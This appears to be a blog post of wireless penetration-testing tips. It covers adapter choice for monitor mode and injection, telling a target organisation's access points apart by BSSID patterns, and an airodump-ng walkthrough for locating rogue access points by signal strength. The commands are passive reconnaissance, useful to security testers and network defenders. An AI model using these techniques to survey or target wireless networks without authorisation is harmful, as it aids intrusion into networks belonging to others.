As a side note: Brad Antoniewicz updated FreeRADIUS-WPE a couple of months ago; use the latest version to save yourself headaches. You can find it in patch and package form here: http://blog.opensecurityresearch.com/2011/09/freeradius-wpe-updated.html

Don't Trust Just One Tool

This one is pretty basic: use more than one tool for discovery. I've found that a lot of tools will incorrectly identify SSIDs, signal strength, and channel at least some of the time, for various reasons. Consequently, consider using tools such as airodump-ng, Kismet, and AirMagnet PRO for discovery. Using multiple tools gives you a good consensus of how things actually look, allowing a more accurate plan of action.

Picking the Best Wireless Adapter

As for which cards work best for monitor mode, injection, etc., I've always had good results with the Ubiquiti SRC300 a/b/g card, which a lot of folks use. Recently I've been using the Ubiquiti SR71-C and SR71-E cards (both a/b/g/n), and I've had good luck with them as well. I also like the Alfa AWUS036H. It's reliable, it's USB so it works in a VM (although that sometimes gives weird results, so I don't prefer it), and its 1 watt of transmit power is helpful when you need range. It's also pretty cheap at around $27. The only downside is that it's b/g only. The card I use for discovery and rogue hunting in AirMagnet is the Ubiquiti SR71-USB, because it covers a/b/g/n and can be used in any laptop with a USB port. I haven't had any luck with it for injection, though, and unfortunately I haven't heard of anyone else having any luck with it either.

MAC Address Trends

You can use the OUI and the last byte of an AP's BSSID to figure out which APs and SSIDs belong to your target organization. This is a simple one, but I see people ignore it quite a bit. First, most organizations buy equipment from a single manufacturer, so the OUI (the first 3 bytes of the BSSID) will be one of a couple of values across all their APs. Second, any given AP will likely host multiple SSIDs, with the 4th and 5th bytes of the BSSID the same for each SSID and the last byte sequential (8A, 8B, 8C, etc.), which indicates they all live on the same AP. This helps confirm that the SSID you would like to attack belongs to your target organization, and, combined with signal strength, it also helps when rogue AP hunting to determine whether the SSID you are looking at is a possible rogue. It isn't an exact science, since someone could spoof a corporate MAC address to hide a rogue, but it helps sort things out when you have a large number of SSIDs flying around.
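As an illustration (the BSSIDs below are made up), a quick way to see the dominant OUI in a discovery capture:

```shell
# Hypothetical BSSIDs pulled from a discovery scan
bssids="00:1A:1E:8A:2B:8A
00:1A:1E:8A:2B:8B
00:1A:1E:8A:2B:8C
00:0C:29:11:22:33"

# Count BSSIDs per OUI (first 3 bytes); the dominant vendor is likely
# the corporate wireless infrastructure
ouis=$(echo "$bssids" | cut -d: -f1-3 | sort | uniq -c | sort -rn)
echo "$ouis"
```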

Rogue AP Hunting

Speaking of rogue hunting, Tony Lee wrote up a short ‘how to’ on rogue hunting with airodump-ng that I’d like to share as my final tip.

  1. Put card in monitor mode:

    airmon-ng start wlan0
  2. Initial Survey and Discovery (note: if the network is n-only, you will miss it):

    airodump-ng --band abg --write Disc mon0
  3. Monitor new AP’s that show up (in another tab type the following)

    watch head -n 30 Disc-01.csv

    Get a cart with wheels and slowly walk a planned route covering the entire floor space. Periodically flip between the tab running airodump-ng and the tab watching the csv file while you are rolling; this is very useful for discovery and later for forming ideas about what may be a rogue and roughly where it is. It may be helpful to make a note of where you were if you see a strange network name show up.
  4. Analyze the discovered networks with the client after the walk in order to eliminate known APs:

    less Disc-01.csv

    Note the ESSID, BSSID (MAC of the AP), and the channel of the unidentifiable rogue APs; you will need this info to track them down.
  5. Find the Rogues

    airodump-ng --band abg --bssid [BSSID] --write [ESSID] mon0

    (All of that information is what you noted in the step above)

    This will allow you to focus on finding only one rogue at a time. Watch the PWR indicator to see how close it is.
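To triage the capture from the command line, the CSV from the steps above can be sliced with awk. The file below is a fabricated two-AP excerpt that follows the airodump-ng CSV column layout; real Disc-01.csv contents will differ:

```shell
# Fabricated excerpt of an airodump-ng CSV (AP section column layout)
cat > Disc-01.csv <<'EOF'
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, # Probes, ESSID, Key
00:1A:1E:8A:2B:8A, 2012-03-06 10:00, 2012-03-06 10:05, 6, 54, WPA2, CCMP, PSK, -40, 100, 0, 0.0.0.0, 0, CorpNet,
00:0C:29:11:22:33, 2012-03-06 10:01, 2012-03-06 10:05, 11, 54, OPN, , , -55, 80, 0, 0.0.0.0, 0, linksys,
EOF

# Print BSSID, channel, and ESSID for each AP row for quick triage
awk -F', *' 'NR > 1 && NF > 13 { printf "%s ch%s %s\n", $1, $4, $14 }' Disc-01.csv
```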

How close is that AP?

Below are general guidelines as to proximity of the AP based off of the PWR indicator in airodump:

50-60: Really close; look around you. A few arm's lengths away.
30-50: ~10-15 ft away.
10-30: In sight, but get closer.
1-10: Far away; maybe a floor or two above or below you, the other end of the office, or potentially the next building over.
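If you want to script this triage, a trivial helper function (thresholds taken from the guide above, treating PWR as an absolute value) might look like:

```shell
# Map an airodump PWR reading to the rough proximity guide above
proximity() {
  pwr=$1
  if   [ "$pwr" -ge 50 ]; then echo "really close"
  elif [ "$pwr" -ge 30 ]; then echo "~10-15 ft away"
  elif [ "$pwr" -ge 10 ]; then echo "in sight, get closer"
  else                         echo "far away"
  fi
}

proximity 55   # -> really close
```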